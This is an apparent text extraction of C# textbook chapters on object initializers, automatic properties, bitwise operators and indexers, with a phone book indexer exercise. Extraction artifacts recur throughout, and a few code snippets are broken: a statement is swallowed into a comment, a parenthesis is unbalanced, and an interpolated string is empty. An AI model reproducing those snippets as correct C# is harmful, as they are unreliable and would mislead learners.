Initializing objects by using properties
In Chapter 7, you learned how to define constructors to initialize an object.
An object can have multiple constructors, and you can define constructors
with varying parameters to initialize different elements in an object. For
example, you could define a class that models a triangle, like this:
Click here to view code image
public class Triangle
{
private int side1Length;
private int side2Length;
private int side3Length;
// default constructor - default values for all sides
public Triangle()
{
this.side1Length = this.side2Length = this.side3Length = 10;
}
// specify length for side1Length, default values for the others
public Triangle(int length1)
{
this.side1Length = length1;
this.side2Length = this.side3Length = 10;
}
// specify length for side1Length and side2Length,
// default value for side3Length
Download from finelybook [email protected]
534
public Triangle(int length1, int length2)
{
this.side1Length = length1;
this.side2Length = length2;
this.side3Length = 10;
}
// specify length for all sides
public Triangle(int length1, int length2, int length3)
{
this.side1Length = length1;
this.side2Length = length2;
this.side3Length = length3;
}
}
Depending on how many fields a class contains and the various
combinations you want to enable for initializing the fields, you could end up
writing a lot of constructors. There are also potential problems if many of the
fields have the same type: you might not be able to write a unique constructor
for all combinations of fields. For example, in the preceding Triangle class,
you could not easily add a constructor that initializes only the side1Length
and side3Length fields because it would not have a unique signature; it would
take two int parameters, and the constructor that initializes side1Length and
side2Length already has this signature. One possible solution is to define a
constructor that takes optional parameters and specify values for the
parameters as named arguments when you create a Triangle object. However,
a better and more transparent solution is to initialize the private fields to a set
of default values and expose them as properties, like this:
Click here to view code image
public class Triangle
{
private int side1Length = 10;
private int side2Length = 10;
private int side3Length = 10;
public int Side1Length
{
set => this.side1Length = value;
}
public int Side2Length
{
set => this.side2Length = value;
}
Download from finelybook [email protected]
535
public int Side3Length
{
set => this.side3Length = value;
}
}
When you create an instance of a class, you can initialize it by specifying
the names and values for any public properties that have set accessors. For
example, you can create Triangle objects and initialize any combination of
the three sides, like this:
Click here to view code image
Triangle tri1 = new Triangle { Side3Length = 15 };
Triangle tri2 = new Triangle { Side1Length = 15, Side3Length = 20 };
Triangle tri3 = new Triangle { Side2Length = 12, Side3Length = 17 };
Triangle tri4 = new Triangle { Side1Length = 9, Side2Length = 12,
Side3Length = 15 };
This syntax is known as an object initializer. When you invoke an object
initializer in this way, the C# compiler generates code that calls the default
constructor and then calls the set accessor of each named property to initialize
it with the value specified. You can specify object initializers in combination
with non-default constructors as well. For example, if the Triangle class also
provided a constructor that took a single string parameter describing the type
of triangle, you could invoke this constructor and initialize the other
properties, like this:
Click here to view code image
Triangle tri5 = new Triangle("Equilateral triangle")
{
Side1Length = 3,
Side2Length = 3,
Side3Length = 3
};
The important point to remember is that the constructor runs first and the
properties are set afterward. Understanding this sequencing is important if the
constructor sets fields in an object to specific values and the properties that
you specify change these values.
You can also use object initializers with automatic properties that are not
read-only, as you will see in the next exercise. In this exercise, you will
define a class for modeling regular polygons that contains automatic
Download from finelybook [email protected]
536
properties for providing access to information about the number of sides the
polygon contains and the length of these sides.
Note You cannot initialize automatic read-only properties in this way;
you have to use one of the techniques described in the previous section.
Define automatic properties and use object initializers
1. In Visual Studio 2017, open the AutomaticProperties solution, which is
located in the \Microsoft Press\VCSBS\Chapter 15\AutomaticProperties
folder in your Documents folder.
The AutomaticProperties project contains the Program.cs file, defining
the Program class with the Main and doWork methods that you have
seen in previous exercises.
2. In Solution Explorer, right-click the AutomaticProperties project, point
to Add, and then click Class to open the Add New Item –
AutomaticProperties dialog box. In the Name box, type Polygon.cs, and
then click Add.
The Polygon.cs file, holding the Polygon class, is created and added to
the project and appears in the Code and Text Editor window.
3. Add the automatic properties NumSides and SideLength to the Polygon
class, as shown here in bold:
Click here to view code image
class Polygon
{
public int NumSides { get; set; }
public double SideLength { get; set; }
}
4. Add the following default constructor shown in bold to the Polygon
class:
Click here to view code image
Download from finelybook [email protected]
537
class Polygon
{
...
public Polygon()
{
this.NumSides = 4;
this.SideLength = 10.0;
}
}
This constructor initializes the NumSides and SideLength fields with
default values. In this exercise, the default polygon is a square with sides
10 units long.
5. Display the Program.cs file in the Code and Text Editor window.
6. Add the statements shown here in bold to the doWork method, replacing
the // TODO: comment:
Click here to view code image
static void doWork()
{
Polygon square = new Polygon();
Polygon triangle = new Polygon { NumSides = 3 };
Polygon pentagon = new Polygon { SideLength = 15.5, NumSides
= 5 };
}
These statements create Polygon objects. The square variable is
initialized by using the default constructor. The triangle and pentagon
variables are also initialized by using the default constructor, and then
this code changes the value of the properties exposed by the Polygon
class. In the case of the triangle variable, the NumSides property is set to
3, but the SideLength property is left at its default value of 10.0. For the
pentagon variable, the code changes the values of the SideLength and
NumSides properties.
7. Add to the end of the doWork method the following code shown in bold:
Click here to view code image
static void doWork()
{
...
Console.WriteLine($"Square: number of sides is
{square.NumSides}, length of each side is {square.SideLength}");
Download from finelybook [email protected]
538
Console.WriteLine($"Triangle: number of sides is
{triangle.NumSides}, length of each side is
{triangle.SideLength}");
Console.WriteLine($"Pentagon: number of sides is
{pentagon.NumSides}, length of each side is
{pentagon.SideLength}");
}
These statements display the values of the NumSides and SideLength
properties for each Polygon object.
8. On the Debug menu, click Start Without Debugging.
Verify that the program builds and runs, writing the messages shown
here to the console window:
9. Press the Enter key to close the application and return to Visual Studio
2017.
Summary
In this chapter, you saw how to create and use properties to provide
controlled access to data in an object. You also saw how to create automatic
properties and how to use properties when initializing objects.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 16, “Handling binary data and using
indexers.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Download from finelybook [email protected]
539
Quick reference
To
Do this
Declare a read/write
property for a
structure or class
Declare the type of the property, its name, a get
accessor, and a set accessor. For example:
Click here to view code image
struct ScreenPosition
{
...
public int X
{
get { ... } // or get => ...
set { ... } // or set => ...
}
...
}
Declare a read-only
property for a
structure or class
Declare a property with only a get accessor. For
example:
Click here to view code image
struct ScreenPosition
{
...
public int X
{
get { ... } // or get => ...
}
...
}
Declare a write-only
property for a
structure or class
Declare a property with only a set accessor. For
example:
Click here to view code image
struct ScreenPosition
{
...
public int X
{
set { ... } // or set => ...
}
...
}
Download from finelybook [email protected]
540
Declare a property in
an interface
Declare a property with just the get or set keyword
or both. For example:
Click here to view code image
interface IScreenPosition
{
int X { get; set; } // no body
int Y { get; set; } // no body
}
Implement an
interface property in
a structure or class
In the class or structure that implements the
interface, declare the property and implement the
accessors. For example:
Click here to view code image
struct ScreenPosition : IScreenPosition
{
public int X
{
get { ... }
set { ... }
}
public int Y
{
get { ... }
set { ... }
}
}
Create an automatic
property
In the class or structure that contains the property,
define the property with empty get and set accessors.
For example:
Click here to view code image
class Polygon
{
public int NumSides { get; set; }
}
If the property is read-only, then initialize the
property either in the object constructor or as the
property is defined. For example:
Click here to view code image
class Circle
Download from finelybook [email protected]
541
{
public DateTime CircleCreatedDate { get; }
= DateTime.Now;
...
}
Use properties to
initialize an object
Specify the properties and their values as a list
enclosed in braces when constructing the object. For
example:
Click here to view code image
Triangle tri3 =
new Triangle { Side2Length = 12,
Side3Length = 17 };
Download from finelybook [email protected]
542
CHAPTER 16
Handling binary data and using
indexers
After completing this chapter, you will be able to:
Store and display integer data using binary and hexadecimal
representations.
Perform bitwise operations in binary data.
Encapsulate logical array-like access to an object by using indexers.
Control read access to indexers by declaring get accessors.
Control write access to indexers by declaring set accessors.
Create interfaces that declare indexers.
Implement indexers in structures and classes that inherit from
interfaces.
Chapter 15, “Implementing properties to access fields,” describes how to
implement and use properties as a means of providing controlled access to
the fields in a class. Properties are useful for mirroring fields that contain a
single value. However, indexers are invaluable if you want to provide access
to items that contain multiple values, and to do so by using a natural and
familiar syntax.
What is an indexer?
Download from finelybook [email protected]
543
You can think of an indexer as a smart array, in much the same way that you
can think of a property as a smart field. Whereas a property encapsulates a
single value in a class, an indexer encapsulates a set of values. The syntax
that you use for an indexer is the same as the syntax that you use for an array.
The best way to understand indexers is to work through an example. First,
you’ll consider a problem and examine a solution that doesn’t use indexers.
Then you’ll work through the same problem and look at a better solution that
does use indexers. The problem concerns integers, or more precisely, the int
type. The example uses C# integers to store and query data stored as binary
data, so, it helps to have an understanding of how you can use the integer
types in C# to store and manipulate binary values. We will discuss this first.
Storing binary values
You normally use an int to hold an integer value. Internally, an int stores its
value as a sequence of 32 bits, where each bit can be either 0 or 1. Most of
the time, you don’t care about this internal binary representation; you just use
an int type as a container that holds an integer value. Sometimes, however,
programmers use the int type for other purposes—some programs use an int
as a set of binary flags and manipulate the individual bits within an int. If you
are an old C hack like I am, what follows should have a very familiar feel.
Note Some older programs used int types to save memory. Such
programs typically date from when the size of computer memory was
measured in kilobytes rather than the gigabytes available these days,
and memory was at an absolute premium. A single int holds 32 bits,
each of which can be 1 or 0. In some cases, programmers assigned 1 to
indicate the value true and 0 to indicate false and then employed an int
as a set of Boolean values.
To make life a little easier for handling data that you want to treat as a
collection of binary values, C# enables you to specify integer constants using
Download from finelybook [email protected]
544
binary notation. You indicate that a constant should be treated as a binary
representation by prefixing it with 0b0. For example, the following code
assigns the binary value 1111 (15 in decimal) to a variable:
uint binData = 0b01111;
Note that this is a 4-bit value, but an integer occupies 32 bits; any bits not
specified are initialized to zero. You should also observe that when you
specify an integer as a binary value, it is good practice to store the result as an
unsigned int (uint). In fact, if you provide a full 32-bit binary value, the C#
compiler will insist that you use a uint.
To help cope with long strings of bits, you can also insert the “_”
character as a separator between blocks of digits, like this:
Click here to view code image
uint moreBinData = 0b0_11110000_01011010_11001100_00001111;
In this example, the “_” separator is used to mark the byte boundaries (32
bits is 4 bytes). You can use the “_” separator anywhere within a binary
constant (not just on byte boundaries); it is ignored by the C# compiler and is
provided simply to help improve the readability of your code.
If you find binary strings a little lengthy, you can opt to specify values
using hexadecimal (base 16) notation by using the 0x0 prefix. The following
two statements assign the same values shown in the previous example to
another pair of variables. Again, you can use the “_” character as a separator
to make the values easier to read:
Click here to view code image
uint hexData = 0x0_0F;
uint moreHexData = 0x0_F0_5A_CC_0F;
Displaying binary values
If you need to display the binary representation of an integer, you can use the
Convert.ToString method. Convert.ToString is a heavily overloaded method
that can generate a string representation of a range of data values held in
different types. If you are converting integer data, you can additionally
specify a numeric base (2, 8, 10, or 16), and the method will convert the
integer to that base using an algorithm a little like the exercises you have seen
Download from finelybook [email protected]
545
in some earlier chapters. The following example prints out the binary value of
the moreHexData variable:
Click here to view code image
uint moreHexData = 0x0_F0_5A_CC_0F;
Console.WriteLine($"{Convert.ToString(moreHexData, 2)}");
// displays 11110000010110101100110000001111
Manipulating binary values
C# provides a set of operators that you can use to access and manipulate the
individual bits in an uint. These operators are as follows:
The NOT (~) operator This is a unary operator that performs a bitwise
complement. For example, if you take the 8-bit value 0b0_11001100
(204 decimal) and apply the ~ operator to it, you obtain the result
0b0_00110011 (51 decimal); all the 1s in the original value become 0s,
and all the 0s become 1s.
Note The examples shown here are purely illustrative and are
accurate only to 8 bits. In C#, the int type is 32 bits, so if you try
any of these examples in a C# application, you will get a 32-bit
result that might be different from those shown in this list. For
example, in 32 bits, 204 is
0b0_00000000_00000000_00000000_11001100, so in C#, ~204 is
0b0_11111111_11111111_ 11111111_00110011 (which is
actually the int representation of –205 in C#).
The left-shift (<<) operator This is a binary operator that performs a
left shift. The 8-bit expression 204 << 2 returns the value 48. (In
binary, 204 decimal is 0b0_11001100, and shifting it left by two places
yields 0b0_00110000, or 48 decimal.) The far-left bits are discarded,
and zeros are introduced from the right. There is a corresponding right-
shift operator (>>).
Download from finelybook [email protected]
546
The OR (|) operator This is a binary operator that performs a bitwise
OR operation, returning a value containing a 1 in each position in
which either of the operands has a 1. For example, the 8-bit expression
204 | 24 has the value 220 (204 is 0b0_11001100, 24 is 0b0_00011000,
and 220 is 0b0_11011100).
The AND (&) operator This operator performs a bitwise AND
operation. AND is similar to the bitwise OR operator, but it returns a
value containing a 1 in each position where both of the operands have a
1. So, the 8-bit expression 204 & 24 is 8 (204 is 0b0_11001100, 24 is
0b0_00011000, and 8 is 0b0_00001000).
The XOR (^) operator This operator performs a bitwise exclusive OR
operation, returning a 1 in each bit where there is a 1 in one operand or
the other but not both. (Two 1s yield a 0; this is the “exclusive” part of
the operator.) So the 8-bit expression 204 ^ 24 is 212 (0b0_11001100 ^
0b0_00011000 is 0b0_11010100).
You can use these operators together to determine the values of the
individual bits in an int. As an example, the following expression uses the
left-shift (<<) and bitwise AND (&) operators to determine whether the sixth
bit from the right of the byte variable named bits is set to 0 or to 1:
(bits & (1 << 5)) != 0
Note The bitwise operators count the positions of bits from right to left,
and the bits are numbered starting at 0. So, bit 0 is the rightmost bit, and
the bit at position 5 is the bit six places from the right.
Suppose that the bits variable contains the decimal value 42. In binary,
this is 0b0_00101010. The decimal value 1 is 0b0_00000001 in binary, and
the expression 1 << 5 has the value 0b0_00100000; the sixth bit is 1. In
binary, the expression bits & (1 << 5) is 0b0_00101010 & 0b0_00100000,
and the value of this expression is 0b0_00100000, which is nonzero. If the
variable bits contains the value 65, or 0b0_01000001, the value of the
expression is 0b0_01000001 & 0b0_00100000, which yields the result
Download from finelybook [email protected]
547
0b0_00000000, or zero.
This is a fairly complicated example, but it’s trivial in comparison to the
following expression, which uses the compound assignment operator &= to
set the bit at position 6 to 0:
bits &= ~(1 << 5)
Similarly, if you want to set the bit at position 6 to 1, you can use the
bitwise OR (|) operator. The following complicated expression is based on
the compound assignment operator |=:
bits |= (1 << 5)
The trouble with these examples is that although they work, they are
fiendishly difficult to understand. They’re complicated, and the solution is a
very low-level one: it fails to create an abstraction of the problem that it
solves, and it is consequently very difficult to maintain code that performs
these kinds of operations.
Solving the same problems using indexers
Let’s pull back from the preceding low-level solution for a moment and
remember what the problem is. You’d like to use an int not as an int but as an
array of bits. Therefore, the best way to solve this problem is to use an int as
if it were an array of bits; in other words, what you’d like to be able to write
in order to access the bit six places from the right in the bits variable is an
expression such as the following (remember that arrays start with index 0):
bits[5]
And, to set the bit four places from the right to true, you’d like to be able
to write this:
bits[3] = true
Note To seasoned C developers, the Boolean value true is synonymous
with the binary value 1, and the Boolean value false is synonymous
with the binary value 0. Consequently, the expression bits[3] = true
Download from finelybook [email protected]
548
means “Set the bit four places from the right of the bits variable to 1.”
Unfortunately, you can’t use the square bracket notation on an int; it
works only on an array or on a type that behaves like an array. So the solution
to the problem is to create a new type that acts like, feels like, and is used like
an array of bool variables but is implemented by using an int. You can
achieve this feat by defining an indexer. Let’s call this new type IntBits.
IntBits will contain an int value (initialized in its constructor), but the idea is
that you’ll use IntBits as an array of bool variables.
Tip The IntBits type is small and lightweight, so it makes sense to
create it as a structure rather than as a class.
Click here to view code image
struct IntBits
{
private int bits;
// Simple constructor, implemented as an expression-bodied method
public IntBits(int initialBitValue) => bits = initialBitValue;
// indexer to be written here
}
To define the indexer, you use a notation that is a cross between a
property and an array. You introduce the indexer with the this keyword,
specify the type of the value returned by the indexer, and also specify the
type of the value to use as the index into the indexer between square brackets.
The indexer for the IntBits struct uses an integer as its index type and returns
a Boolean value. It looks like this:
Click here to view code image
struct IntBits
{
...
public bool this [ int index ]
Download from finelybook [email protected]
549
{
get => (bits & (1 << index)) != 0;
set
{
if (value) // turn the bit on if value is true; otherwise,
turn it off bits |= (1 << index);
else
bits &= ~(1 << index);
}
}
}
Notice the following points:
An indexer is not a method; there are no parentheses containing a
parameter, but there are square brackets that specify an index. This
index is used to specify which element is being accessed.
All indexers use the this keyword. A class or structure can define at
most one indexer (although you can overload it and have several
implementations), and it is always named this.
Indexers contain get and set accessors just like properties. In this
example, the get and set accessors contain the complicated bitwise
expressions previously discussed.
The index specified in the indexer declaration is populated with the
index value specified when the indexer is called. The get and set
accessor methods can read this argument to determine which element
should be accessed.
Note You should perform a range check on the index value in the
indexer to prevent any unexpected exceptions from occurring in your
indexer code.
It is also good practice to provide a way to display the data in this
structure. You can do this by overriding the ToString method and converting
the value held in the structure to a string containing its binary representation,
Download from finelybook [email protected]
550
like this:
Click here to view code image
struct IntBits
{
...
public override string ToString()
{
return (Convert.ToString(bits, 2);
}
}
After you have created the indexer, you can use a variable of type IntBits
instead of an int and apply the square bracket notation, as shown in the next
example:
Click here to view code image
int adapted = 0b0_01111110;
IntBits bits = new IntBits(adapted);
bool peek = bits[6]; // retrieve bool at index 6; should be true (1)
bits[0] = true; // set the bit at index 0 to true (1)
bits[3] = false; // set the bit at index 3 to false (0)
Console.WriteLine($""); // displays 1110111 (0b0_01110111)
This syntax is certainly much easier to understand. It directly and
succinctly captures the essence of the problem.
Understanding indexer accessors
When you read an indexer, the compiler automatically translates your array-
like code into a call to the get accessor of that indexer. Consider the
following example:
bool peek = bits[6];
This statement is converted to a call to the get accessor for bits, and the
index argument is set to 6.
Similarly, if you write to an indexer, the compiler automatically translates
your array-like code into a call to the set accessor of that indexer, setting the
index argument to the value enclosed in the square brackets, such as
illustrated here:
bits[3] = true;
Download from finelybook [email protected]
551
This statement is converted to a call to the set accessor for bits where
index is 3. As with ordinary properties, the data you are writing to the indexer
(in this case, true) is made available inside the set accessor by using the value
keyword. The type of value is the same as the type of the indexer itself (in
this case, bool).
It’s also possible to use an indexer in a combined read/write context. In
this case, both the get and set accessors are used. Look at the following
statement, which uses the XOR operator (^) to invert the value of the bit at
index 6 in the bits variable:
bits[6] ^= true;
This code is automatically translated into the following:
bits[6] = bits[6] ^ true;
This code works because the indexer declares both a get and a set
accessor.
Note You can declare an indexer that contains only a get accessor (a
read-only indexer) or only a set accessor (a write-only indexer).
Comparing indexers and arrays
When you use an indexer, the syntax is deliberately very array-like.
However, there are some important differences between indexers and arrays:
Indexers can use nonnumeric subscripts, such as a string (as shown in
the following example), whereas arrays can use only integer subscripts.
Click here to view code image
public int this [ string name ] { ... } // OK
Indexers can be overloaded (just like methods), whereas arrays cannot.
Click here to view code image
public Name this [ PhoneNumber number ] { ... }
Download from finelybook [email protected]
552
public PhoneNumber this [ Name name ] { ... }
Indexers cannot be used as ref or out parameters, whereas array
elements can.
Click here to view code image
IntBits bits; // bits contains an indexer
Method(ref bits[1]); // compile-time error
Properties, arrays, and indexers
It is possible for a property to return an array, but remember that arrays
are reference types, so exposing an array as a property creates the
possibility of accidentally overwriting a lot of data. Look at the
following structure that exposes an array property named Data:
Click here to view code image
struct Wrapper
{
private int[] data;
...
public int[] Data
{
get => this.data;
set => this.data = value;
}
}
Now consider the following code that uses this property:
Click here to view code image
Wrapper wrap = new Wrapper();
...
int[] myData = wrap.Data;
myData[0]++;
myData[1]++;
This looks pretty innocuous. However, because arrays are reference
types, the variable myData refers to the same object as the private data
variable in the Wrapper structure. Any changes you make to elements in
myData are made to the data array; the expression myData[0]++ has
the very same effect as data[0]++. If this is not your intention, you
should use the Clone method in the get and set accessors of the Data
Download from finelybook [email protected]
553
property to return a copy of the data array, or make a copy of the value
being set, as shown in the code that follows. (Chapter 8, “Understanding
values and references,” discusses the Clone method for copying arrays.)
Notice that the Clone method returns an object, which you must cast to
an integer array.
Click here to view code image
struct Wrapper
{
private int[] data;
...
public int[] Data
{
get { return this.data.Clone() as int[]; }
set { this.data = value.Clone() as int[]; }
}
}
However, this approach can become very messy and expensive in
terms of memory use. Indexers provide a natural solution to this
problem—don’t expose the entire array as a property; just make its
individual elements available through an indexer:
Click here to view code image
struct Wrapper
{
private int[] data;
...
public int this [int i]
{
get => this.data[i];
set => this.data[i] = value;
}
}
The following code uses the indexer in a similar manner to the
property shown earlier:
Click here to view code image
Wrapper wrap = new Wrapper();
...
int[] myData = new int[2];
myData[0] = wrap[0];
myData[1] = wrap[1];
myData[0]++;
myData[1]++;
Download from finelybook [email protected]
554
This time, incrementing the values in the myData array has no effect
on the original array in the Wrapper object. If you really want to modify
the data in the Wrapper object, you must write statements such as this:
wrap[0]++;
This is much clearer and safer!
Indexers in interfaces
You can declare indexers in an interface. To do this, specify the get keyword,
the set keyword, or both, but replace the body of the get or set accessor with a
semicolon. Any class or structure that implements the interface must
implement the indexer accessors declared in the interface, as demonstrated
here:
Click here to view code image
interface IRawInt
{
bool this [ int index ] { get; set; }
}
struct RawInt : IRawInt
{
...
public bool this [ int index ]
{
get { ... }
set { ... }
}
...
}
If you implement the interface indexer in a class, you can declare the
indexer implementations as virtual. This allows further derived classes to
override the get and set accessors, such as in the following:
Click here to view code image
class RawInt : IRawInt
{
...
public virtual bool this [ int index ]
{
Download from finelybook [email protected]
555
get { ... }
set { ... }
}
...
}
You can also choose to implement an indexer by using the explicit
interface implementation syntax covered in Chapter 13, “Creating interfaces
and defining abstract classes.” An explicit implementation of an indexer is
nonpublic and nonvirtual (and so cannot be overridden), as shown in this
example:
Click here to view code image
struct RawInt : IRawInt
{
...
bool IRawInt.this [ int index ]
{
get { ... }
set { ... }
}
...
}
Using indexers in a Windows application
In the following exercise, you will examine a simple phone book application
and complete its implementation. You will write two indexers in the
PhoneBook class: one that accepts a Name parameter and returns a
PhoneNumber, and another that accepts a PhoneNumber parameter and
returns a Name. (The Name and PhoneNumber structures have already been
written.) You will also need to call these indexers from the correct places in
the program.
Familiarize yourself with the application
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Indexers solution, which is located in the \Microsoft
Press\VCSBS\Chapter 16\Indexers folder in your Documents folder.
With this graphical application, a user can search for the telephone
number for a contact, and also find the name of a contact that matches a
Download from finelybook [email protected]
556
given telephone number.
3. On the Debug menu, click Start Debugging.
The project builds and runs. A form appears, displaying two empty text
boxes labeled Name and Phone Number. The form initially displays two
buttons: one to find a phone number when given a name, and one to find
a name when given a phone number. Expanding the command bar at the
bottom of the form reveals an additional Add button that will add a
name/phone number pair to a list of names and phone numbers held by
the application. All buttons (including the Add button in the command
bar) currently do nothing. The application looks like this:
Your task is to complete the application so that the buttons work.
4. Return to Visual Studio 2017 and stop debugging.
5. Display the Name.cs file for the Indexers project in the Code and Text
Editor window. Examine the Name structure. Its purpose is to act as a
holder for names.
Download from finelybook [email protected]
557
The name is provided as a string to the constructor. The name can be
retrieved by using the read-only string property named Text. (The
Equals and GetHashCode methods are used for comparing Names when
searching through an array of Name values—you can ignore them for
now.)
6. Display the PhoneNumber.cs file in the Code and Text Editor window,
and examine the PhoneNumber structure. It is similar to the Name
structure.
7. Display the PhoneBook.cs file in the Code and Text Editor window and
examine the PhoneBook class.
This class contains two private arrays: an array of Name values called
names, and an array of PhoneNumber values called phoneNumbers. The
PhoneBook class also contains an Add method that adds a phone number
and name to the phone book. This method is called when the user clicks
the Add button on the form. The enlargeIfFull method is called by Add
to check whether the arrays are full when the user adds another entry.
This method creates two new, bigger arrays, copies the contents of the
existing arrays to them, and then discards the old arrays.
The Add method is deliberately kept simple and does not check whether
a name or phone number has already been added to the phone book.
The PhoneBook class does not currently provide any functionality with
which a user can find a name or telephone number; you will add two
indexers to provide this facility in the next exercise.
Write the indexers
1. In the PhoneBook.cs file, delete the comment // TODO: write 1st
indexer here and replace it with a public read-only indexer for the
PhoneBook class, as shown in bold in the code that follows. The indexer
should return a Name and take a PhoneNumber item as its index. Leave
the body of the get accessor blank.
The indexer should look like this:
Click here to view code image
sealed class PhoneBook
Download from finelybook [email protected]
558
{
...
public Name this[PhoneNumber number]
{
get
{
}
}
...
}
2. Implement the get accessor as shown in bold in the code that follows.
The purpose of the accessor is to find the name that matches the
specified phone number. To do this, you need to call the static IndexOf
method of the Array class. The IndexOf method performs a search
through an array, returning the index of the first item in the array that
matches the specified value. The first argument to IndexOf is the array to
search through (phoneNumbers). The second argument to IndexOf is the
item for which you are searching. IndexOf returns the integer index of
the element if it finds it; otherwise, IndexOf returns –1. If the indexer
finds the phone number, it should return the corresponding name.
Otherwise, it should return an empty Name value. (Note that Name is a
structure, so the default constructor sets its private name field to null.)
Click here to view code image
sealed class PhoneBook
{
...
public Name this [PhoneNumber number]
{
get
{
int i = Array.IndexOf(this.phoneNumbers, number);
if (i != -1)
{
return this.names[i];
}
else
{
return new Name();
}
}
}
...
}
Download from finelybook [email protected]
559
3. Remove the comment // TODO: write 2nd indexer here and replace it
with a second public read-only indexer for the PhoneBook class that
returns a PhoneNumber and accepts a single Name parameter.
Implement this indexer in the same way as the first one, as shown in
bold in the code that follows. (Again, note that PhoneNumber is a
structure and therefore always has a default constructor.)
The second indexer should look like this:
Click here to view code image
sealed class PhoneBook
{
...
public PhoneNumber this [Name name]
{
get
{
int i = Array.IndexOf(this.names, name);
if (i != -1)
{
return this.phoneNumbers[i];
}
else
{
return new PhoneNumber();
}
}
}
...
}
Notice that these overloaded indexers can coexist because the values
that they index are of different types, which means that their signatures
are different. If the Name and PhoneNumber structures were replaced by
simple strings (which they wrap), the overloads would have the same
signature, and the class would not compile.
4. On the Build menu, click Build Solution, correct any syntax errors, and
then rebuild the solution if necessary.
Call the indexers
1. Display the MainPage.xaml.cs file in the Code and Text Editor window
and then locate the findByNameClick method.
Download from finelybook [email protected]
560
This method is called when the Find By Name button is clicked. This
method is currently empty. Replace the // TODO: comment with the
code shown in bold in the example that follows. This code performs
these tasks:
a. Reads the value of the Text property from the name text box on the
form. This is a string containing the contact name that the user has
typed in.
b. If the string is not empty, the code searches for the phone number
corresponding to that name in the PhoneBook by using the indexer.
(Notice that the MainPage class contains a private PhoneBook field
named phoneBook.) It constructs a Name object from the string, and
passes it as the parameter to the PhoneBook indexer.
c. If the Text property of the PhoneNumber structure returned by the
indexer is not null or empty, the code writes the value of this property
to the phoneNumber text box on the form; otherwise, it displays the
text “Not Found.”
The completed findByNameClick method should look like this:
Click here to view code image
private void findByNameClick(object sender, RoutedEventArgs e)
{
string text = name.Text;
if (!String.IsNullOrEmpty(text))
{
Name personsName = new Name(text);
PhoneNumber personsPhoneNumber =
this.phoneBook[personsName];
phoneNumber.Text =
String.IsNullOrEmpty(personsPhoneNumber.Text) ?
"Not Found" : personsPhoneNumber.Text;
}
}
Other than the statement that accesses the indexer, there are two further
points of interest in this code:
The static String method IsNullOrEmpty is used to determine
whether a string is empty or contains a null value. This is the
preferred method for testing whether a string contains a value. It
returns true if the string contains a null value or it is an empty
Download from finelybook [email protected]
561
string; otherwise, it returns false.
The ? : operator used by the statement that populates the Text
property of the phone- Number text box on the form. Remember
that this operator acts like an inline if…else statement for an
expression. In the preceding code, if the expression
String.IsNullOrEmpty (personsPhoneNumber.Text) is true, no
matching entry was found in the phone book and the text “Not
Found” is displayed on the form; otherwise, the value held in the
Text property of the personsPhoneNumber variable is displayed.
2. Locate the findByPhoneNumberClick method in the MainPage.xaml.cs
file. It is below the findByNameClick method.
The findByPhoneNumberClick method is called when the Find By
Phone Number button is clicked. This method is currently empty apart
from a // TODO: comment. You need to implement it as follows (the
completed code is shown in bold in the example that follows):
a. Read the value of the Text property from the phoneNumber box on the
form. This is a string containing the phone number that the user has
typed.
b. If the string is not empty, use the indexer to search for the name
corresponding to that phone number in the PhoneBook.
c. Write the Text property of the Name structure returned by the indexer
to the name box on the form.
The completed method should look like this:
Click here to view code image
private void findByPhoneNumberClick(object sender,
RoutedEventArgs e)
{
string text = phoneNumber.Text;
if (!String.IsNullOrEmpty(text))
{
PhoneNumber personsPhoneNumber = new PhoneNumber(text);
Name personsName = this.phoneBook[personsPhoneNumber];
name.Text = String.IsNullOrEmpty(personsName.Text) ?
"Not Found" : personsName.Text;
}
}
Download from finelybook [email protected]
562
3. On the Build menu, click Build Solution, and then correct any errors that
occur.
Test the application
1. On the Debug menu, click Start Debugging.
2. Type your name and phone number in the appropriate boxes, and then
expand the command bar and click Add. (You can expand the command
bar by clicking the ellipsis.)
When you click the Add button, the Add method stores the information
in the phone book and clears the text boxes so that they are ready to
perform a search.
3. Repeat step 2 several times with some different names and phone
numbers so that the phone book contains a selection of entries. Note that
the application performs no checking of the names and telephone
numbers that you enter, and you can input the same name and telephone
number more than once. For the purposes of this demonstration, to avoid
confusion, be sure that you provide different names and telephone
numbers.
4. Type a name that you used in step 3 into the Name box, and then click
Find By Name.
The phone number you added for this contact in step 3 is retrieved from
the phone book and is displayed in the Phone Number text box.
5. Type a phone number for a different contact in the Phone Number box,
and then click Find By Phone Number.
The contact name is retrieved from the phone book and is displayed in
the Name box.
6. Type a name that you did not enter in the phone book into the Name
box, and then click Find By Name.
This time, the Phone Number box displays the message “Not Found.”
7. Close the form, and return to Visual Studio 2017.
Download from finelybook [email protected]
563
Summary
In this chapter, you saw how to use indexers to provide array-like access to
data in a class. You learned how to create indexers that can take an index and
return the corresponding value by using logic defined by the get accessor, and
you saw how to use the set accessor with an index to populate a value in an
indexer.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 17, “Introducing generics.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Specify an integer value
using binary or
hexadecimal notation
Use the 0b0 (for binary values) or 0x0 (for
hexadecimal values) prefixes. Include “_”
separators to make values easier to read. For
example:
Click here to view code image
uint moreBinData =
0b0_11110000_01011010_11001100_ 00001111;
uint moreHexData = 0x0_F0_5A_CC_0F;
Display an integer value as
its binary or hexadecimal
representation
Use the Convert.ToString method, and specify
2 (for binary) or 16 (for hexadecimal) as the
number base. For example:
Click here to view code image
uint moreHexData = 0x0_F0_5A_CC_0F;
Console.WriteLine($"
{Convert.ToString(moreHexData, 2)}");
// displays
11110000010110101100110000001111
Create an indexer for a
class or structure
Declare the type of the indexer, followed by
the keyword this, and then the indexer
arguments in square brackets. The body of the
Download from finelybook [email protected]
564
indexer can contain a get and/or set accessor.
For example:
Click here to view code image
struct RawInt
{
...
public bool this [ int index ]
{
get { ... }
set { ... }
}
...
}
Define an indexer in an
interface
Define an indexer with the get and/or set
keywords. For example:
Click here to view code image
interface IRawInt
{
bool this [ int index ] { get; set; }
}
Implement an interface
indexer in a class or
structure
In the class or structure that implements the
interface, define the indexer and implement the
accessors. For example:
Click here to view code image
struct RawInt : IRawInt
{
...
public bool this [ int index ]
{
get { ... }
set { ... }
}
...
}
Implement an indexer
defined by an interface by
using explicit interface
implementation in a class
or structure
